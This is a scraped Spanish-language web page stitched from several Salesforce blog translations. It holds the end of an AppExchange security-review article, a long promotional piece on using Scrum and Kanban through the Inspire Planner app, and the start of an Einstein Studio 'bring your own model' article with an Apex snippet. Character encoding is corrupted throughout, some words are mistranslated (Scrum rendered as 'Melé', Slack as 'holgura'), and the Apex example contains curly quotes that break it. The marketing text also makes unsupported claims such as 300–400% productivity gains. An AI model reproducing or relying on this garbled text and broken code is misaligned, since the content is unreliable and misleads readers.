Salesforce Product Security tambi茅n utiliza Code Analyzer , PMD para VS Code y Checkmarx para revisar el c贸digo fuente del paquete Salesforce. Tambi茅n utilizan la base de datos CVE y el esc谩ner Qualys SSL en la mayor铆a de los env铆os.

Si tiene problemas de seguridad y necesita orientaci贸n t茅cnica, los socios ISV pueden registrarse para obtener horas de oficina gratuitas con nuestros ingenieros de seguridad a trav茅s del Portal de seguridad para socios .

Por 煤ltimo, no podemos recomendar lo suficiente Trailhead en t茅rminos de preparaci贸n para revisiones de seguridad. Vale la pena dedicar tiempo a la ruta Desarrollar aplicaciones web seguras y tambi茅n acabamos de renovar el m贸dulo Revisi贸n de seguridad de AppExchange , que analiza el proceso de env铆o de un extremo a otro.

Sobre el Autor

Anika Teppo es evangelista t茅cnica en Salesforce. Ha estado trabajando con el equipo de revisi贸n de seguridad de AppExchange en Salesforce desde 2017, y su funci贸n actual consiste en hacer que Salesforce Labs y las soluciones internas se revisen y publiquen en AppExchange.

Obtenga las 煤ltimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a trav茅s de Slack o RSS.

A帽adir a holgura Suscr铆bete a RSS

Continue reading

Incorporaci贸n de Agile en Salesforce DevOps – Inspire Planner

Incorporaci贸n de Agile en Salesforce DevOps - Inspire Planner

La r谩pida era digital exige que las empresas entreguen valor de manera r谩pida y eficiente. Sin embargo, los equipos dispersos geogr谩ficamente y las operaciones de desarrollo complejas, particularmente en Salesforce DevOps, a menudo pueden dar lugar a plazos incumplidos, equipos tensos y flujos de trabajo inconexos. Ah铆 es donde entra en juego Agile en Salesforce DevOps.

La gesti贸n 谩gil de proyectos ofrece una soluci贸n que incorpora las metodolog铆as Scrum y Kanban para permitir una adaptaci贸n r谩pida, una colaboraci贸n mejorada y una entrega continua de software de alta calidad, lo que ayuda a las empresas a mantenerse competitivas y cumplir con las expectativas de los clientes.

En una encuesta realizada por KPMG, el 84% de los participantes informaron que su organizaci贸n utiliza metodolog铆as Scrum o Kanban. Entonces, la pregunta es, 驴y t煤?

Comprensi贸n de Agile en Salesforce DevOps: Scrum y Kanban

Tabla de contenido

Las metodolog铆as 谩giles son estrategias flexibles que facilitan una gesti贸n de proyectos 谩gil y eficiente en el desarrollo de software. Se basan en los principios de:

  • Transparencia : este principio garantiza que todos los aspectos del proyecto sean visibles para todos los responsables del resultado. Esto incluye informaci贸n sobre los objetivos, el progreso y el proceso del proyecto.
  • Inspecci贸n : los miembros del equipo y las partes interesadas inspeccionan con frecuencia el progreso y el trabajo hacia la meta del proyecto para detectar variaciones no deseadas.
  • Adaptaci贸n : si el equipo identifica discrepancias significativas durante una inspecci贸n, debe ajustar su proceso o los materiales en los que se est谩 trabajando.

Mel茅

Scrum est谩 dise帽ado para equipos compuestos por diez miembros o menos. Este enfoque implica dividir el trabajo en objetivos que deben cumplirse dentro de per铆odos espec铆ficos conocidos como sprints. Un Sprint es un per铆odo de tiempo dentro del cual se crea un incremento de producto "Terminado", utilizable y potencialmente liberable.

Por lo general, cada sprint dura hasta un mes, pero la duraci贸n m谩s com煤n es de dos semanas. El equipo eval煤a su progreso en reuniones diarias de scrum, que son debates r谩pidos que no superan los 15 minutos.

Al finalizar un sprint, se llevan a cabo dos reuniones adicionales: una revisi贸n del sprint para mostrar el trabajo a las partes interesadas y recopilar sus comentarios, y una retrospectiva del sprint que permite al equipo reflexionar e identificar 谩reas de mejora.

Gesti贸n de proyectos Scrum en Inspire Planner, la aplicaci贸n de gesti贸n de proyectos nativa de Salesforce
Creaci贸n de un Sprint en Inspire Planner, una aplicaci贸n de gesti贸n de proyectos nativa de Salesforce

Kanban

Kanban es un sistema visual que ayuda a administrar el trabajo, identificar cuellos de botella y garantizar un flujo de trabajo eficiente y rentable.

Kanban sigue cuatro principios:

  • Visualice el flujo de trabajo : un modelo visual del trabajo permite a los miembros observar el flujo de trabajo que se mueve a trav茅s del sistema y responder r谩pidamente a los bloqueos.
  • Limite el trabajo en progreso (WIP) : al limitar la cantidad de trabajo sin terminar que est谩 en proceso, los equipos pueden reducir el tiempo que tarda un elemento en viajar a trav茅s del sistema Kanban.
  • Gestionar Flujo : La gesti贸n de elementos de trabajo debe ser continua y enfocada a lograr un flujo fluido, con tiempos de finalizaci贸n r谩pidos y trabajo de calidad.
  • Mejora continua : los equipos deben analizar continuamente su flujo de trabajo y hacer los ajustes necesarios para mejorar el rendimiento y la eficiencia.
Tablero Kanban en Inspire Planner, aplicaci贸n de gesti贸n de proyectos nativa de SalesforceTablero Kanban en Inspire Planner, aplicaci贸n de gesti贸n de proyectos nativa de Salesforce
Tablero Kanban en Inspire Planner, una herramienta de gesti贸n de proyectos nativa de Salesforce

An谩lisis comparativo de Scrum y Kanban

El siguiente an谩lisis le brinda una breve descripci贸n general de qu茅 marco podr铆a usar en su organizaci贸n.

Mel茅 Kanban
Flujo de rutina frente a flujo continuo Scrum se basa en iteraciones de tiempo limitado llamadas Sprints, generalmente de 1 a 4 semanas de duraci贸n. Se enfoca en el flujo continuo y no tiene plazos espec铆ficos.
roles Ayuda a los equipos a administrar proyectos complejos dividi茅ndolos en "sprints" manejables y con l铆mites de tiempo con revisiones peri贸dicas y retrospectivas Mejora la transparencia y la eficiencia del flujo de trabajo al visualizar las tareas y limitar el trabajo en curso
Filosof铆a del cambio Scrum desalienta los cambios dentro de un sprint. Permite realizar cambios en cualquier momento
Alcance del Trabajo Funciona mejor con proyectos complejos con elementos interdependientes que requieren colaboraci贸n. Funciona bien para tareas en curso y actividades de mantenimiento.

Fortalezas y limitaciones de Agile en Salesforce DevOps: Scrum vs Kanban

Por supuesto, antes de decidir qu茅 marco usar para Agile en Salesforce DevOps, es esencial observar sus fortalezas y limitaciones:

Mel茅 Kanban
Fortalezas + Adecuado para proyectos complejos donde se necesita una estrecha colaboraci贸n y una respuesta r谩pida.
+ Funciones y responsabilidades bien definidas mejoran la rendici贸n de cuentas.
+ Las revisiones peri贸dicas y las retrospectivas fomentan la mejora continua.
+ Excelente visualizaci贸n del trabajo en curso.
+ Flexibilidad para manejar cambios o nuevas tareas.
+ Ideal para flujos de trabajo continuos e ininterrumpidos.
Limitaciones 鈥 Las iteraciones fijas pueden generar ineficiencias si no se completa todo el trabajo dentro del sprint.
鈥 No es tan flexible para cambiar a mitad del sprint.
鈥 Requiere un alto nivel de disciplina y comprensi贸n de los principios de Scrum.
鈥 Puede que no sea tan efectivo para tareas complejas e interdependientes.
鈥 Sin disciplina, los l铆mites WIP pueden ignorarse, lo que genera cuellos de botella.
鈥 La falta de limitaciones de tiempo puede dar lugar a retrasos y falta de urgencia.

El papel de Scrum en Salesforce DevOps

Salesforce es una plataforma altamente personalizable que requiere actualizaciones y mejoras frecuentes para satisfacer las necesidades din谩micas de las empresas. Aqu铆 es donde Scrum puede traer ventajas significativas.

  • Desarrollo iterativo : el enfoque iterativo de Scrum se alinea bien con el desarrollo de Salesforce. Permite lanzamientos menores e incrementales con cada sprint, lo que permite a los equipos responder m谩s r谩pidamente a los requisitos y cambios comerciales.
  • Claridad de funciones : las funciones definidas en Scrum (Propietario del producto, Scrum Master y Equipo de desarrollo) brindan responsabilidades y responsabilidades claras, fomentando un entorno de trabajo en equipo s贸lido y una comunicaci贸n efectiva, que son fundamentales en los proyectos de Salesforce.
  • Comentarios y mejoras continuas : con las revisiones y retrospectivas peri贸dicas de Scrum, el equipo puede aprender y adaptarse continuamente a las necesidades cambiantes. Esta agilidad es especialmente beneficiosa dados los frecuentes lanzamientos y actualizaciones de Salesforce.
  • Mitigaci贸n de riesgos : los sprints breves y delimitados en el tiempo permiten la identificaci贸n y resoluci贸n temprana de problemas o riesgos, lo que reduce las posibilidades de fracaso del proyecto. Para obtener m谩s detalles sobre este tema, consulte nuestro art铆culo sobre c贸mo reducir los riesgos y problemas imprevistos del proyecto.

Beneficios de usar Scrum y Agile en Salesforce DevOps

Mejorar la colaboraci贸n, la flexibilidad y la productividad en Salesforce DevOps con Scrum es una excelente manera de garantizar que los proyectos se entreguen con 茅xito y a tiempo. Este es el por qu茅:

  • Colaboraci贸n : Scrum fomenta un entorno altamente colaborativo. Las reuniones diarias de Scrum mantienen a todos alineados sobre el estado y los desaf铆os del proyecto, lo que promueve una resoluci贸n de problemas m谩s efectiva. Adem谩s, la comprensi贸n compartida y la comunicaci贸n frecuente reducen los malentendidos y la repetici贸n del trabajo.
  • Flexibilidad : la naturaleza iterativa de Scrum permite que los cambios se incorporen f谩cilmente en el pr贸ximo sprint. Esto es particularmente beneficioso en Salesforce DevOps, donde los cambios son frecuentes debido a nuevos requisitos comerciales, comentarios de clientes o actualizaciones de Salesforce.
  • Productividad : al dividir el proyecto en unidades manejables (sprints), los equipos pueden enfocarse mejor y producir un trabajo de alta calidad, mejorando la productividad. Adem谩s, la visibilidad de la capacidad del equipo evita la sobrecarga y fomenta un ritmo sostenible, lo que contribuye a elevar la moral y mejorar a煤n m谩s la productividad.

    Los equipos que implementan efectivamente las metodolog铆as Scrum pueden presenciar un aumento de la productividad que oscila entre el 300 % y el 400 %.

  • Satisfacci贸n del cliente : Scrum se enfoca en brindar valor con cada sprint, lo que lleva a resultados frecuentes y tangibles. Esta entrega constante de caracter铆sticas valiosas puede aumentar la satisfacci贸n del cliente mediante el uso de Agile en Salesforce DevOps.

    Cuando MediaMarkt, el minorista de electr贸nica de consumo l铆der en Europa, se expandi贸 a China en 2010, desarroll贸 r谩pidamente una innovadora suite de planificaci贸n de recursos empresariales (ERP) en un a帽o. Gracias a la metodolog铆a Scrum y un equipo colaborativo, implementaron m煤ltiples aplicaciones est谩ndar, lo que facilit贸 el lanzamiento de nuevas tiendas en Asia y prepar贸 un crecimiento sustancial en China.

Aprovechamiento de Kanban para Salesforce DevOps

Kanban es una metodolog铆a Agile robusta que mejora la visibilidad y la eficiencia en los entornos de Salesforce DevOps. As铆 es c贸mo:

  • Visibilidad : Kanban utiliza un tablero visual (tablero Kanban) para representar el flujo de trabajo. Cada tarea o historia de usuario se representa como una tarjeta en este tablero, movi茅ndose de una columna a otra a medida que avanza. El uso de tableros Kanban para administrar el flujo de trabajo ha experimentado un aumento constante, con el 61 % de los encuestados us谩ndolos ahora, un aumento sustancial del 6 % inicial informado en la primera encuesta.
  • Eficiencia : al establecer l铆mites de trabajo en curso (WIP), Kanban evita que los miembros del equipo se sientan abrumados con demasiadas tareas. Esto conduce a un mejor enfoque y una finalizaci贸n m谩s r谩pida de las tareas. Cuando se identifica un cuello de botella (por ejemplo, demasiadas tareas en una columna en particular), se aborda de inmediato para mantener el flujo de trabajo de manera eficiente.
  • Entrega continua : en un entorno de Salesforce DevOps, a menudo existe la necesidad de entrega, mantenimiento o soporte continuos. Kanban respalda esto al promover un flujo continuo de trabajo en lugar de trabajar en iteraciones o sprints de longitud fija.

    Siemens Health Services quer铆a aumentar la velocidad y la calidad de la entrega de software. A pesar de los contratiempos iniciales con sus m茅todos 谩giles, el cambio hacia el pensamiento Lean y la adopci贸n de Kanban mejoraron dr谩sticamente la transparencia de sus procesos, aumentaron la calidad del trabajo, redujeron las tasas de defectos y, en 煤ltima instancia, impulsaron el compromiso del equipo, lo que hizo que sus productos fueran m谩s competitivos en un mercado exigente.

  • Flexibilidad : Kanban permite agregar nuevas tareas a la cartera de pedidos en cualquier momento, siempre que se respeten los l铆mites WIP. Esto es particularmente beneficioso en un entorno de Salesforce DevOps donde existe la necesidad de reaccionar r谩pidamente ante nuevos problemas o cambios.

Pasos para integrar la metodolog铆a Kanban en proyectos de Salesforce

Estos son los pasos pr谩cticos necesarios para integrar de manera efectiva la metodolog铆a Kanban en sus proyectos de Salesforce para mejorar la visibilidad y la eficiencia:

  • Defina las etapas del flujo de trabajo : divida su flujo de trabajo en distintas etapas. Algunas de las etapas t铆picas incluyen Backlog, En desarrollo, UAT y Completado, pero se pueden ajustar seg煤n las necesidades espec铆ficas de su proyecto.
  • Cree un tablero Kanban : use una herramienta de gesti贸n de proyectos f铆sica o digital como Inspire Planner para crear su tablero Kanban. Representa cada etapa del flujo de trabajo como una columna en el tablero.
  • Cree tarjetas para tareas : escriba cada tarea o historia de usuario en una tarjeta separada y coloque estas tarjetas en la columna correspondiente en el tablero Kanban.
  • Establecer l铆mites de trabajo en curso (WIP) : defina cu谩ntas tareas pueden estar en curso en cada etapa de su flujo de trabajo en un momento dado. Esto evita la sobrecarga y ayuda a identificar cuellos de botella.
  • Administre y perfeccione el flujo de trabajo : mueva las tarjetas de izquierda a derecha en el tablero a medida que avanza el trabajo. Revise regularmente la junta para identificar y abordar los cuellos de botella. Respete los l铆mites WIP y mueva una tarjeta a la siguiente etapa cuando haya capacidad.
  • Mejora continua : revise y analice el flujo de trabajo con regularidad. Busque formas de mejorar la eficiencia, como ajustar los l铆mites WIP o redefinir las etapas. El objetivo es lograr un flujo de trabajo fluido y eficiente.

10 mejores pr谩cticas para integrar metodolog铆as 谩giles en Salesforce DevOps

Las siguientes pr谩cticas pueden ayudarlo a integrar Agile en Salesforce DevOps:

  • Entrenamiento y educaci贸n

    Aseg煤rese de que los miembros de su equipo comprendan los principios Agile y las pr谩cticas de Scrum o Kanban en funci贸n de la metodolog铆a elegida. Invierta en cursos de capacitaci贸n, talleres y recursos relevantes.

  • Empieza peque帽o

    Comience con un proyecto peque帽o que no tenga mucho en juego. Esto permitir谩 que su equipo aprenda y se adapte a Agile en Salesforce DevOps en un entorno de baja presi贸n.

  • Seleccione un marco 谩gil adecuado

    Elija Scrum o Kanban seg煤n los requisitos de su proyecto. Scrum es ideal para proyectos complejos que requieren una estrecha colaboraci贸n, mientras que Kanban es adecuado para flujos de trabajo continuos con tareas independientes.

  • Utilice herramientas 谩giles de gesti贸n de proyectos

    Utilice herramientas dise帽adas espec铆ficamente para pr谩cticas 谩giles. Herramientas como Inspire Planner y Jira pueden facilitar los flujos de trabajo Scrum y Kanban, facilitando la transici贸n. Si su organizaci贸n utiliza Salesforce, idealmente deber铆a buscar una herramienta de gesti贸n de proyectos nativa de Salesforce en AppExchange.

  • Promover una cultura colaborativa

    Fomente la comunicaci贸n abierta, la retroalimentaci贸n frecuente y la colaboraci贸n activa. Recuerde, Agile en Salesforce DevOps se trata tanto de mentalidad y cultura como de procesos y herramientas.

  • Hacer uso de otras herramientas de DevOps

    Hay otras herramientas de Salesforce DevOps disponibles que tambi茅n pueden ayudar a los equipos a colaborar de manera efectiva para garantizar que el software que entregan sea r谩pido y confiable.

  • Perfeccione regularmente el trabajo pendiente : las sesiones peri贸dicas de preparaci贸n del trabajo pendiente garantizan que su trabajo pendiente siga siendo relevante, priorizado y manejable.
  • Aceptar los cambios : los cambios son una parte integral de Agile. Est茅 preparado para incorporar cambios en el pr贸ximo sprint (en Scrum) o cuando el l铆mite WIP lo permita (en Kanban).
  • Realice retrospectivas : despu茅s de cada sprint (en Scrum) o a intervalos regulares (en Kanban), realice reuniones retrospectivas para analizar qu茅 funcion贸 bien, qu茅 no y c贸mo puede mejorar el equipo.
  • Aproveche las herramientas de Salesforce : puede usar herramientas como Inspire Planner que est谩n espec铆ficamente dise帽adas para administrar procesos Agile directamente en Salesforce. Esto puede ser particularmente 煤til si su proyecto implica el desarrollo de Salesforce.
Inspire Planner: herramienta 谩gil de gesti贸n de proyectos para SalesforceInspire Planner: herramienta 谩gil de gesti贸n de proyectos para Salesforce

8 errores a evitar al incorporar Agile en Salesforce DevOps

La incorporaci贸n de Agile en Salesforce DevOps puede traer muchos beneficios, pero hay ciertas trampas que se deben evitar para garantizar una implementaci贸n y ejecuci贸n sin problemas:

  • No entrenar al equipo : Scrum y Kanban requieren una comprensi贸n clara de los principios y pr谩cticas involucrados. Es vital asegurarse de que su equipo reciba la capacitaci贸n adecuada antes de la implementaci贸n.
  • Descuidar la comunicaci贸n : la comunicaci贸n regular y clara es crucial en las metodolog铆as 谩giles. Sin ella, pueden surgir malas interpretaciones que conduzcan a ineficiencias y errores.
  • Sobrecargar el flujo de trabajo : Agile no significa hacer m谩s trabajo en menos tiempo. Se trata de administrar el trabajo de manera m谩s efectiva. Aseg煤rese de que la carga de trabajo del equipo sea manejable y sostenible. En Kanban, es esencial no exceder el l铆mite de trabajo en curso (WIP). La sobrecarga puede provocar cuellos de botella, lo que reduce la productividad general.
  • Descuidar la calidad : para entregar r谩pidamente, los equipos pueden comprometer la calidad. Incorpore pr谩cticas como el desarrollo basado en pruebas (TDD) y las pruebas automatizadas para garantizar que la calidad no se vea afectada.
  • Ignorando las retrospectivas : Scrum fomenta las retrospectivas peri贸dicas para identificar y abordar 谩reas de mejora. Ignorar estas reuniones puede dificultar la mejora continua, que es vital en Agile en Salesforce DevOps.
  • No adaptarse al cambio : las metodolog铆as 谩giles como Scrum y Kanban se tratan de aceptar el cambio. La resistencia al cambio puede hacer que estas metodolog铆as sean menos efectivas. Supere esto a trav茅s de capacitaci贸n, comunicaci贸n abierta sobre los beneficios de Agile en Salesforce DevOps e involucrando a los miembros del equipo en el proceso de transici贸n.
  • Uso incorrecto de herramientas : las herramientas de Salesforce y Agile deben usarse de manera efectiva para monitorear el progreso y administrar los flujos de trabajo. El uso incorrecto puede generar confusi贸n e ineficiencia. Busque una aplicaci贸n de gesti贸n de proyectos de Salesforce Agile que ofrezca un proceso adecuado de incorporaci贸n y formaci贸n.
  • Falta de participaci贸n de las partes interesadas : el aporte de las partes interesadas es invaluable en las metodolog铆as 谩giles. Ignorar sus comentarios puede generar productos que no satisfagan las necesidades de los usuarios.

Herramientas compatibles con metodolog铆as 谩giles en Salesforce DevOps

Varias herramientas pueden ayudar a administrar los flujos de trabajo de Scrum y Kanban, incluidas Jira, Inspire Planner y Trello.

jira

Atlassian desarroll贸 Jira como una herramienta vers谩til compatible con Scrum, Kanban y metodolog铆as mixtas. Sus s贸lidas funciones incluyen la priorizaci贸n de tareas pendientes, la planificaci贸n de sprints, los gr谩ficos de avance y reducci贸n, los flujos de trabajo personalizados y m谩s. Sin embargo, para integrar Jira con Salesforce, deber谩 configurar una soluci贸n de integrador de terceros y mantenerla a lo largo del tiempo.

Inspirar planificador

Por el contrario, la herramienta llamada Inspire Planner es una aplicaci贸n de gesti贸n de proyectos 100% nativa de Salesforce que es totalmente compatible con las metodolog铆as Scrum y Kanban listas para usar. Inspire Planner tiene m谩s de 130 rese帽as de 5 estrellas en AppExchange e incluye todas las funciones est谩ndar, como trabajos pendientes, sprints, puntos de la historia, gr谩ficos de trabajo pendiente y m谩s.

Al ser nativo de Salesforce, Inspire Planner no solo ofrece una integraci贸n perfecta con Salesforce, sino que tambi茅n le permite personalizar completamente la aplicaci贸n para agilizar su proceso de gesti贸n de proyectos.

驴Y si necesita la gesti贸n de proyectos tradicional de Waterfall? No se preocupe, Inspire Planner tambi茅n ofrece funciones avanzadas de gesti贸n de proyectos para esta metodolog铆a, incluido un gr谩fico de Gantt interactivo, gesti贸n de recursos, seguimiento del tiempo, carteras, gesti贸n de riesgos, l铆neas base, dependencias de tareas avanzadas, ruta cr铆tica, uso compartido externo, gesti贸n de restricciones, automatizaci贸n. , y mucho m谩s.

Trello

Trello es un sistema f谩cil de usar basado en tarjetas para visualizar el trabajo y administrar los flujos de trabajo de Kanban. Las tarjetas de Trello pueden representar historias de usuarios o tareas, que se pueden mover entre listas (que representan diferentes etapas de su flujo de trabajo) en un tablero de Trello.

Aunque no tiene el nivel de personalizaci贸n o las funciones de generaci贸n de informes detallados como Inspire Planner y Jira, la simplicidad de Trello lo convierte en una opci贸n atractiva para equipos m谩s peque帽os o proyectos simples.

Una mirada m谩s cercana a Inspire Planner

Inspire Planner est谩 dise帽ado para ser una soluci贸n de gesti贸n de proyectos Agile integral pero f谩cil de usar para Salesforce. El hecho de que sea nativo de Salesforce significa que inherentemente funciona bien con sus datos existentes en Salesforce, evitando por completo la necesidad de integraciones.

Inspire Planner Gesti贸n 谩gil de proyectos en SalesforceInspire Planner Gesti贸n 谩gil de proyectos en Salesforce

Aqu铆 hay algunas razones por las que Inspire Planner podr铆a ser una buena opci贸n para su equipo:

  • Soporte 谩gil completo : Inspire Planner es compatible con las metodolog铆as Scrum y Kanban desde el primer momento para que pueda elegir el mejor enfoque para las necesidades de su proyecto. Puede gestionar f谩cilmente la acumulaci贸n de productos, planificar sprints, realizar un seguimiento de los puntos de la historia, visualizar el trabajo mediante tableros Kanban, gestionar recursos y analizar el progreso con gr谩ficos de evoluci贸n.
  • Integraci贸n perfecta con Salesforce : dado que Inspire Planner vive dentro de su organizaci贸n de Salesforce, puede vincular directamente sus historias de usuario o tareas a cualquier registro de Salesforce como Oportunidades, Casos y Cuentas, incluidos los registros de sus objetos personalizados. Esto reduce la duplicaci贸n de datos y conecta sus datos de Salesforce con sus flujos de trabajo 谩giles.
  • Colaboraci贸n : Aprovecha Chatter de Salesforce para la comunicaci贸n, fomentando la colaboraci贸n dentro del equipo. Tambi茅n puede compartir el estado del proyecto con las partes interesadas directamente en Salesforce.
  • Interfaz intuitiva y familiar : incorpore r谩pidamente nuevos equipos e impulse la adopci贸n a trav茅s de una experiencia de usuario perfecta y una interfaz de usuario familiar. Utilice funciones est谩ndar como Tareas de Salesforce, Chatter, Informes y Paneles, y m谩s.

Elegir la herramienta adecuada para sus necesidades y el tama帽o de su equipo

Elegir la herramienta adecuada depende del tama帽o de su equipo, la complejidad del proyecto y la metodolog铆a Agile que siga. Aqu铆 hay algunas pautas:

  • Tama帽o del equipo y complejidad del proyecto : para equipos peque帽os o proyectos menos complejos, la simplicidad de Trello puede ser ventajosa. Una herramienta m谩s robusta como Jira o Inspire Planner podr铆a ser m谩s adecuada para equipos m谩s grandes o proyectos complejos que requieren flujos de trabajo personalizados, informes detallados y m谩s.
  • Integraci贸n de Salesforce : si su organizaci贸n utiliza mucho Salesforce, una aplicaci贸n nativa de Salesforce como Inspire Planner podr铆a ser la mejor opci贸n para una integraci贸n perfecta. Y si es nuevo en Salesforce, puede mejorar sus habilidades con los mejores recursos de capacitaci贸n de Salesforce para comenzar.
  • Metodolog铆a 谩gil : si su equipo sigue estrictamente Scrum, tanto Inspire Planner como Jira podr铆an ser preferibles. Para Kanban, las tres herramientas podr铆an satisfacer sus necesidades. Para una combinaci贸n de metodolog铆as Agile y Waterfall, Inspire Planner ser铆a la mejor opci贸n.
  • Presupuesto : El costo podr铆a ser otro factor decisivo. Trello suele ser m谩s rentable para equipos peque帽os, mientras que Jira e Inspire Planner ofrecen funciones m谩s avanzadas a un costo mayor.

Conclusi贸n

La incorporaci贸n de Agile en Salesforce DevOps realmente puede amplificar la adaptabilidad, la colaboraci贸n en equipo, la satisfacci贸n del cliente, la eficiencia y la gesti贸n de riesgos. El 茅nfasis en el desarrollo iterativo y la garant铆a de calidad garantiza est谩ndares de primer nivel dentro del desarrollo y las operaciones de Salesforce.

Sin embargo, es importante recordar que el coraz贸n de Agile radica en cultivar una mentalidad comprometida con el aprendizaje continuo y la adaptabilidad.

Aqu铆 hay algunas ideas procesables:

  • Comprom茅tase con el aprendizaje continuo : anime a su equipo a aprender de cada iteraci贸n y use esos conocimientos para impulsar mejoras en los siguientes sprints.
  • Acepta el cambio : el cambio es la 煤nica constante en Agile. Fomentar un entorno en el que el cambio no solo se acepte, sino que se acoja como una oportunidad para mejorar.
  • Fomentar la colaboraci贸n : promover una cultura de comunicaci贸n abierta y colaboraci贸n. Esto puede conducir a soluciones m谩s innovadoras y a un equipo m谩s fuerte.
  • Involucrar a las partes interesadas : involucrar regularmente a las partes interesadas en las revisiones de sprint para garantizar que el producto satisfaga las necesidades y expectativas de los usuarios.
  • Aproveche las herramientas de manera efectiva : use las herramientas de Salesforce y Agile de manera efectiva para realizar un seguimiento del progreso, administrar los flujos de trabajo y facilitar la comunicaci贸n.

Al adoptar estas estrategias, los equipos pueden desbloquear todo el potencial de las metodolog铆as 谩giles, lo que lleva a un mayor rendimiento y niveles elevados de satisfacci贸n del cliente.

Continue reading

Traiga sus propios modelos de IA a la nube de datos 鈽侊笍

Traiga sus propios modelos de IA a la nube de datos 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Lleve sus propios modelos de IA a la nube de datos | Blog de desarrolladores de Salesforce

Einstein Studio es una plataforma f谩cil de usar que le permite crear y poner en funcionamiento la IA en Salesforce. La plataforma aprovecha el poder de otras plataformas de IA, como Amazon SageMaker y Google Cloud Vertex AI, para que pueda crear, entrenar e implementar modelos de IA personalizados de forma externa utilizando datos en Salesforce. En este blog, presentamos Einstein Studio y exploramos c贸mo la capacidad de traer su propio modelo (BYOM) generalmente disponible puede generar resultados para su negocio.

Presentamos Traiga su propio modelo (BYOM)

Einstein Studio le permite conectarse f谩cilmente a modelos predictivos o generativos y usarlos en el flujo de trabajo en Salesforce. Por ejemplo, los modelos predictivos se pueden usar para puntuar clientes potenciales, recomendar productos o detectar abandonos. Con modelos generativos, puede crear contenido como res煤menes de casos, respuestas de correo electr贸nico y descripciones de productos. Para obtener m谩s informaci贸n sobre la IA generativa y los modelos de lenguaje extenso (LLM), consulte el blog de Salesforce 360 .

Conectar un modelo con Einstein Studio es simple. Puede integrar f谩cilmente su modelo con Data Cloud para acceder a predicciones e informaci贸n en tiempo real y usar la informaci贸n de varias maneras. Por ejemplo, para enriquecer los perfiles de los clientes, crear segmentos y personalizar la experiencia del usuario final en diferentes canales. Tambi茅n puede usar un modelo generativo para crear campa帽as de correo electr贸nico personalizadas basadas en las preferencias de un cliente y su comportamiento de compra.

驴Por qu茅 traer su propio modelo?

Estos son algunos de los beneficios de usar un modelo de Amazon SageMaker con datos de Data Cloud en Einstein Studio.

  • Acceda a datos altamente seleccionados, armonizados y casi en tiempo real en Customer 360 en SageMaker.
  • Elimina la necesidad de trabajos ETL tediosos, costosos y propensos a errores. Este enfoque de federaci贸n de copia cero para los datos reduce la sobrecarga para administrar las copias de datos, los costos de almacenamiento y mejora la eficiencia.
  • Crea modelos r谩pidamente en SageMaker y conecta los modelos en Data Cloud para consumir predicciones para la optimizaci贸n de procesos comerciales.
  • Admite la ingesta de datos en tiempo real, en streaming y por lotes para impulsar los resultados de IA relevantes.
  • Permite el uso sin inconvenientes de modelos y predicciones de SageMaker en Salesforce mediante Flow, un paquete de automatizaci贸n de flujos de trabajo. Flow permite la toma de decisiones impulsada por IA que puede evolucionar en funci贸n de actualizaciones de datos en tiempo real.

Casos de uso

Estos son algunos casos de uso en los que Einstein Studio puede mejorar la experiencia del cliente y agregar un toque personal.

Caso de uso minorista

Un minorista puede crear un modelo de IA personalizado para predecir la probabilidad de que un cliente compre atuendos espec铆ficos en funci贸n de los datos de compromiso, como su historial de compras o actividad en l铆nea. Luego pueden implementar el modelo y utilizar Einstein Studio para ofrecer recomendaciones de productos hiperpersonalizados a los clientes a trav茅s del canal m谩s apropiado, incluido el correo electr贸nico, una aplicaci贸n m贸vil o las redes sociales.

Caso de uso de viaje

Una agencia de viajes puede conectar los datos de CRM, como el historial de reservas del cliente y las preferencias de viaje, con datos que no son de CRM, como rese帽as de destinos y previsiones meteorol贸gicas. Luego pueden implementar modelos de IA predictivos y generativos para predecir qu茅 destinos atraen a clientes espec铆ficos y generar recomendaciones de correo electr贸nico personalizadas para ellos.

Caso de uso automotriz

Una marca automotriz puede usar inteligencia artificial predictiva para determinar cu谩ndo es probable que un autom贸vil necesite mantenimiento y detectar reclamos de seguros fraudulentos. Luego, la IA generativa se puede utilizar para personalizar las campa帽as de marketing de los clientes en funci贸n de las necesidades y preferencias individuales.

Flujo de trabajo de la aplicaci贸n para usar Einstein Studio con AWS SageMaker

En esta secci贸n, analizamos brevemente el flujo de trabajo de la aplicaci贸n con Einstein Studio.

En este flujo de trabajo, el conector de Python otorga a SageMaker acceso seguro a los objetos de Salesforce Data Cloud. Despu茅s de la autenticaci贸n, los especialistas en datos pueden explorar y preparar los datos, y realizar tareas de ingenier铆a de funciones para el desarrollo y la inferencia de modelos de IA mediante la interfaz visual interactiva de SageMaker Data Wrangler .

El flujo de trabajo anterior es espec铆fico de Data Wrangler. Pero, 驴qu茅 sucede si es un cient铆fico de datos y planea usar los cuadernos de SageMaker Studio para desarrollar y preparar sus modelos personalizados? Una vez que se aprueba un modelo en el registro de SageMaker, simplificamos el proceso con una plantilla de proyecto de SageMaker para Salesforce para automatizar la implementaci贸n en un extremo de invocaci贸n.

Este extremo de invocaci贸n se configura como destino en Einstein Studio y se integra con las aplicaciones de Salesforce Customer 360. Para obtener m谩s informaci贸n sobre este flujo de trabajo, consulte el blog de AWS .

C贸mo consumir predicciones de su modelo en Salesforce

Hay dos formas de consumir predicciones. Usando acciones invocables en Flow y Apex, o con an谩lisis ad hoc.

Use Flow Builder y Apex para obtener predicciones

Aqu铆 hay un flujo que usa una acci贸n invocable para crear recomendaciones de productos para un cliente.

En este ejemplo, un administrador usa Flow Builder para separar los registros de individuos unificados para verificar si se realiz贸 una compra reciente. Si se realiz贸 la compra, la acci贸n invocable obtiene la inferencia del modelo de Einstein Studio y recomienda el siguiente mejor producto a un cliente.

Esta acci贸n invocable tambi茅n se puede llamar en Apex. Vea el ejemplo a continuaci贸n.

<dx-code-block title language="apex" code-block="Invocable.Action action = Invocable.Action.createCustomAction('cdpGetMlPrediction', 'EinsteinStudio_model_name');
action.setInvocationParameter('variable_1', '10');
action.setInvocationParameter('variable2', '20');
action.setInvocationParameter('variable3', '30');
List results = action.invoke();
if (results.size() > 0 && results[0].isSuccess()) { System.debug(‘Result is: ‘ + results[0].getOutputParameters().get(‘param_score’));
} else { System.debug(‘Error message’ + results[0].getErrors());
} “>

Para obtener instrucciones sobre el uso de acciones invocables en Flow y Apex, consulte la Ayuda de Salesforce .

